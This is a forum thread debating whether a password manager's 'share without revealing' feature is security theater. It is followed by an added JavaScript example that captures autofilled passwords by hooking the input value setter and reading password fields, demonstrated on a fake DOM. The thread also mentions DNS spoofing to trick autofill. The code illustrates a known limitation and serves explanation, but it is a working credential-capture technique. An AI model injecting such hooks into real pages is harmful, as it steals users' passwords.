
> There's a feature where you can even share the login to a site on it, but they can't view the password - only lastpass can fill it up.

Prime example of Lastpass security theater - what exact problem did they think this feature solved?



People easily copying and pasting the password into a chat app to quickly share it with Greg from finance asking if he could just quickly log into the app even though he's not really supposed to?

Sure, it's not too hard to get around that feature, you could just inject your own JavaScript on the page to dump the contents of the password field. But it does block the low hanging fruit of the millions of users who don't know how to do that who might abuse having access to the password because they don't really know better.

In essence, it helps to prevent those users who don't know better from leaking the password to places it shouldn't be. Obviously it doesn't prevent people who know how to get around it from getting around that protection, but in those circumstances you shouldn't really be sharing your password with someone who will abuse your trust.


The people likely to do such things counter to security are going to click phishing links, install malware and misuse their company devices anyway. Their problem is not technological in nature to solve - it is personal and behavioral. I call it theater because it doesn't significantly improve the security posture and maturity, while making both the user and administrator feel tough and hardened.


> The people likely to do such things counter to security are going to click phishing links, install malware and misuse their company devices anyway.

Are you arguing that because they might make mistakes elsewhere we shouldn't bother putting any barriers up to them breaking policy, and that the only thing we should do is more training? I'd argue both things should be done. I do agree preventing LastPass from directly exposing the password isn't a very strong protection, but let's not act like it doesn't prevent any kind of password abuse. Sure, users should be more trained, but we should also create more barriers to prevent them from shooting off their toes.

It almost sounds like an argument to get rid of barriers on highways. Drivers should just know to not drive off the cliff; if people are driving off the highway clearly all we need to do is train them more. Barriers are just safety theater, people might still end up driving off the cliff if they try hard enough!

You asked for a use case for this feature and I gave you a use case that happens all the time and which such a feature prevents for a large percentage of those users. You'd need someone determined to break the policy to dump the password and share it someplace they shouldn't, as opposed to someone doing it without thinking "is this against policy? shrug".


Not having to rotate shared passwords after an employee leaves I suppose?


I think parent is referring to the idea that it's not a problem for a technically inclined person to, when the extension is filling out the password, inspect the password HTML element and "see" it. Other options would include sniffing network traffic in your browser or replacing DNS with a self-hosted website with a form under the same domain to trick the extension into filling in a form on a website you control (since they match based on the typed-in domain).


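The two comments above describe the same bypass in words: once an extension autofills a "hidden" password into a form, any script running in that page can read it. The following is an added example written for this page, not code from the thread, from LastPass, or from any other product. It shows the two variants mentioned: reading the filled field from the DOM, and wrapping the input prototype's `value` setter so the fill is captured the instant it is written, even if the field is cleared afterwards. In a real browser you would pass `HTMLInputElement.prototype` and `document`; `FakeInput`, `makeFakeDocument`, `demo` and the sample credentials are constructed stand-ins so the script also runs offline under Node.

```javascript
// Added example: page-side script that defeats an "autofill only, never shown"
// password. Function names and the fake DOM below are this example's own.

// Variant 2 from the thread: hook the prototype's `value` setter so every
// programmatic write to a password input is copied into `sink` as it happens.
function installValueTap(inputProto, sink) {
  const desc = Object.getOwnPropertyDescriptor(inputProto, 'value');
  if (!desc || typeof desc.set !== 'function') {
    throw new Error('value accessor not found on prototype');
  }
  Object.defineProperty(inputProto, 'value', {
    configurable: true,
    enumerable: desc.enumerable,
    get() { return desc.get.call(this); },
    set(v) {
      if (this.type === 'password') {
        sink.push({ name: this.name, value: String(v) });
      }
      desc.set.call(this, v);
    },
  });
  // Uninstaller that puts the original accessor back.
  return () => Object.defineProperty(inputProto, 'value', desc);
}

// Variant 1 from the thread: after the extension has filled the form,
// simply read the password inputs out of the DOM.
function readPasswordFields(root) {
  return Array.from(root.querySelectorAll('input[type="password"]'))
    .map(el => ({ name: el.name, value: el.value }));
}

// ---- constructed stand-ins so this runs outside a browser ----
class FakeInput {
  constructor(type, name) { this.type = type; this.name = name; this._v = ''; }
}
// Mirror the browser: `value` lives as an accessor on the prototype.
Object.defineProperty(FakeInput.prototype, 'value', {
  configurable: true,
  enumerable: true,
  get() { return this._v; },
  set(v) { this._v = String(v); },
});

function makeFakeDocument(inputs) {
  return {
    querySelectorAll(sel) {
      // Only the one selector this example needs.
      if (sel !== 'input[type="password"]') throw new Error('unsupported selector');
      return inputs.filter(i => i.type === 'password');
    },
  };
}

// Walk through both variants with constructed sample data.
function demo() {
  const user = new FakeInput('text', 'username');
  const pass = new FakeInput('password', 'password');
  const doc = makeFakeDocument([user, pass]);
  const captured = [];
  const uninstall = installValueTap(FakeInput.prototype, captured);

  // Stand-in for the extension's autofill: a plain programmatic assignment.
  user.value = 'greg@example.test';                 // constructed sample
  pass.value = 'correct horse battery staple';      // constructed sample
  const dumped = readPasswordFields(doc);

  // Even if the field is wiped afterwards, the setter tap already has a copy.
  pass.value = '';
  uninstall();
  return { captured, dumped };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

The setter hook is the more fragile of the two: an extension that caches the native setter before page scripts run, or that writes the field through a different path, will not trip it. Reading the field after the fill (`readPasswordFields`) does not depend on how the value got there, which is why a "can't view the password" guarantee cannot be enforced on the client once the password is in the page.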

